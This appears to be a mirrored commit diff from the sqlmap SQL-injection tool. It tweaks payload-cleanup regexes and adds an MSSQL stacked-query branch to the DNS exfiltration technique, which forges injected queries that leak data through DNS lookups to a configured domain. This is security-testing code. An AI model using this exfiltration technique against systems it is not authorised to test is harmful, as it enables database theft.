sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-02-03 05:04:11 +03:00
Code Issues Packages Projects Releases Wiki Activity

minor update

Browse Source
This commit is contained in:
Miroslav Stampar 2012-04-02 14:57:15 +00:00
parent 8a9d09f79b
commit 2c28423cb8
3 changed files with 21 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
lib/core/agent.py
View File

@ -200,7 +200,7 @@ class Agent:
elif any([kb.injection.suffix, suffix]):
expression += " %s" % (kb.injection.suffix or suffix)
return expression
return re.sub(r"(?s);\W*;", ";", expression)
def cleanupPayload(self, payload, origValue=None):
if payload is None:

3
lib/core/common.py
View File

@ -1608,7 +1608,8 @@ def getSPLSnippet(dbms, name, **variables):
checkFile(filename)
retVal = readCachedFileContent(filename)
retVal = re.sub(r"#.+", "", retVal).strip()
retVal = re.sub(r"#.+", "", retVal)
retVal = re.sub(r"(?s);\W+", "; ", retVal).strip()
for _ in variables.keys():
retVal = re.sub(r"%%%s%%" % _, variables[_], retVal)

18
lib/techniques/dns/use.py
View File

@ -13,12 +13,15 @@ import time
from lib.core.agent import agent
from lib.core.common import Backend
from lib.core.common import calculateDeltaSeconds
from lib.core.common import cleanQuery
from lib.core.common import dataToStdout
from lib.core.common import decodeHexValue
from lib.core.common import extractRegexResult
from lib.core.common import getSPLSnippet
from lib.core.common import hashDBRetrieve
from lib.core.common import hashDBWrite
from lib.core.common import pushValue
from lib.core.common import popValue
from lib.core.common import randomInt
from lib.core.common import randomStr
from lib.core.common import safecharencode
@ -29,6 +32,7 @@ from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import queries
from lib.core.enums import DBMS
from lib.core.enums import PAYLOAD
from lib.core.settings import MAX_DNS_LABEL
from lib.core.settings import PARTIAL_VALUE_MARKER
from lib.core.unescaper import unescaper
@ -53,6 +57,7 @@ def dnsUse(payload, expression):
if output is None:
kb.dnsMode = True
pushValue(kb.technique)
while True:
count += 1
@ -67,8 +72,18 @@ def dnsUse(payload, expression):
expressionRequest = getSPLSnippet(Backend.getIdentifiedDbms(), "dns_request", PREFIX=prefix, QUERY=expressionReplaced, SUFFIX=suffix, DOMAIN=conf.dnsDomain)
expressionUnescaped = unescaper.unescape(expressionRequest)
if Backend.isDbms(DBMS.MSSQL):
kb.technique = PAYLOAD.TECHNIQUE.STACKED
expression = cleanQuery(expression)
comment = queries[Backend.getIdentifiedDbms()].comment.query
query = agent.prefixQuery("; %s" % expressionUnescaped)
query = agent.suffixQuery("%s;%s" % (query, comment))
forgedPayload = agent.payload(newValue=query)
else:
forgedPayload = safeStringFormat(payload, (expressionUnescaped, randomInt(1), randomInt(3)))
Request.queryPage(forgedPayload, content=False, raise404=False)
Request.queryPage(forgedPayload, content=False, noteResponseTime=False, raise404=False)
_ = conf.dnsServer.pop(prefix, suffix)
if _:
@ -81,6 +96,7 @@ def dnsUse(payload, expression):
else:
break
kb.technique = popValue()
kb.dnsMode = False
if output is not None: